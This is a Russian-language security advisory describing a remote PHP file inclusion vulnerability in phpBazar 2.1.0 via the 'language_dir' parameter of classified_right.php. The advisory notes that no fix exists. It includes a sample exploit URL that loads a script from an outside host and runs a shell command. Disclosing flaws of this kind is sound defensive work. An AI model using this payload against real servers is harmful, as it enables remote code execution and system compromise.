PHP-инклюдинг в phpBazar

Дата публикации:
24.05.2006
Дата изменения:
25.08.2008
Всего просмотров:
2025
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2528
CVE-2006-2527
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpBazar 2.x
Уязвимые версии: phpBazar 2.1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "language_dir" в сценарии "classified_right.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls

URL производителя: www.smartisoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpBazar <= 2.1.0 Multiple vulnerabilites

или введите имя

CAPTCHA